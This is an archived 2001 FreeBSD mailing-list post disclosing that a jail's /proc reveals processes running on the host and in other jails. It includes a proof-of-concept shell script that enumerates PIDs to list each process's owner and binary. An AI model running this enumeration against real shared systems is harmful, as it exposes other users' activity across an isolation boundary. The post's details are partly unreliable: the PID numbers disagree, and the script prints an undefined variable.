From owner-freebsd-hackers Mon Oct 29 9:33:38 2001 Delivered-To: freebsd-hackers@freebsd.org Received: from bigglesworth.mail.be.easynet.net (bigglesworth.mail.be.easynet.net [212.100.160.67]) by hub.freebsd.org (Postfix) with ESMTP id CA06637B410 for ; Mon, 29 Oct 2001 09:33:32 -0800 (PST) Received: from 212-100-182-27.adsl.easynet.be ([212.100.182.27] helo=venus.core.bsdaemon.be) by bigglesworth.mail.be.easynet.net with smtp (Exim 3.16 #1) id 15yGHu-0001kk-00 for freebsd-hackers@freebsd.org; Mon, 29 Oct 2001 18:33:26 +0100 Date: Mon, 29 Oct 2001 18:36:26 +0100 From: opr To: freebsd-hackers@freebsd.org Subject: jail's /proc Message-Id: <20011029183626.36f8e686.opr@bsdaemon.be> Organization: BSDaemon X-Mailer: Sylpheed version 0.6.1 (GTK+ 1.2.10; i386--freebsd4.3) Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-freebsd-hackers@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG Hello, i really have no clue if i should mail this to you guys, but we've found some issue's in de jail's /proc. We were able to find information about processes running outside the jail, or running in other jails. eg. when i run sshd in the host system, and it has PID 655, i can login on the jail, and by execution "ls -l /proc/665/file" i can see what binary is running on pid 655. So any user of the jail system can see what processes you run on that server. I'm running FreeBSD 4.4-RELEASE on a i386. greetz, Pieter Danhieux Proof of concept shellscript: #!/bin/sh _COUNT=0; while [ $_COUNT -le 65000 ]; do if [ -f /proc/$_COUNT/file ]; then _USER=`/bin/ls -l /proc/$_COUNT/file | cut -d" " -f4`; _PROC=`/bin/ls -l /proc/$_COUNT/file | cut -d" " -f14`; echo "PID= $_TELLER USER= $_USER PROC= $_PROC"; fi _COUNT=`expr $_COUNT + 1`; done ----------------- [www.bsdaemon.be] ----------------- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-hackers" in the body of the message